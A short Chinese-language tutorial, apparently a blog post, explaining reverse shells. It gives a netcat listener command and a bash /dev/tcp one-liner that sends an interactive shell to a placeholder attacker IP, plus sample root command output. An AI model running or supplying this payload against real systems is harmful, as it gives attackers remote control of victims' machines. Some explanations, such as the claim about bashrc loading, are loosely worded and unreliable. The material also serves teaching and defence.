什么是反弹shell

简介

反弹Shell（Reverse Shell）是一种网络攻击技术，用于通过远程主机上的Shell（命令行终端）与攻击者建立连接，从而控制受攻击主机。攻击者通常在受攻击主机上以各种方式植入恶意代码（如后门程序），然后通过网络与该主机上运行的Shell建立反向连接，从而获得对该主机的完全控制权。

反弹Shell技术通常是针对目标主机的防火墙和安全措施进行攻击。攻击者首先在目标主机上放置一个能够向外发起TCP或UDP连接的恶意程序，并将其设定为在特定条件下自动启动。一旦触发条件满足，该程序就会连接到攻击者控制的探测器，探测器再向受害者发送Shell命令，使其通过网络连接到攻击者并打开一个反向Shell会话，从而暴露受害主机的操作系统环境。

反弹Shell技术有很高的隐蔽性，攻击者可以通过此技术偷偷地在主机上执行任何指令，例如查看文件、复制数据、运行程序等，同时也可以进一步侵入其他相关系统。因此，这种技术已经成为黑客在网络攻击中广泛使用的利器之一。

简单案例

服务端

利用NC命令开启监听端口

nc -lvp 4578

nc -lvp 4578命令将使得nc在本地监听4578端口，并等待来自远程主机的连接请求

客户端

通过某种方式让被攻击者执行下面这段命令

bash -i >& /dev/tcp/xx.xx.xx.xx/4578 0>&1

这段话是Bash Shell的命令。它以交互式方式运行Bash，并将标准输入（stdin）、标准输出（stdout）和标准错误输出（stderr）重定向到IP地址为xx.xx.xx.xx的计算机上的端口4578。

具体来说，bash -i 参数表示以交互式方式运行Bash Shell并加载当前目录下的bashrc文件（如果存在）。>& /dev/tcp/xx.xx.xx.xx/4578 重定向了stdout和stderr到远程计算机的端口4578。最后的 0>&1 重定向了stdin到stdout，因为stdin在Bash中通常被认为是一个文件（在这里没有文件可以被重定向）。

结果

当客户端执行命令后服务端会有反显，后就可以执行shell命令了

# id
uid=0(root) gid=0(root) groups=0(root)

执行id命令，返回结果。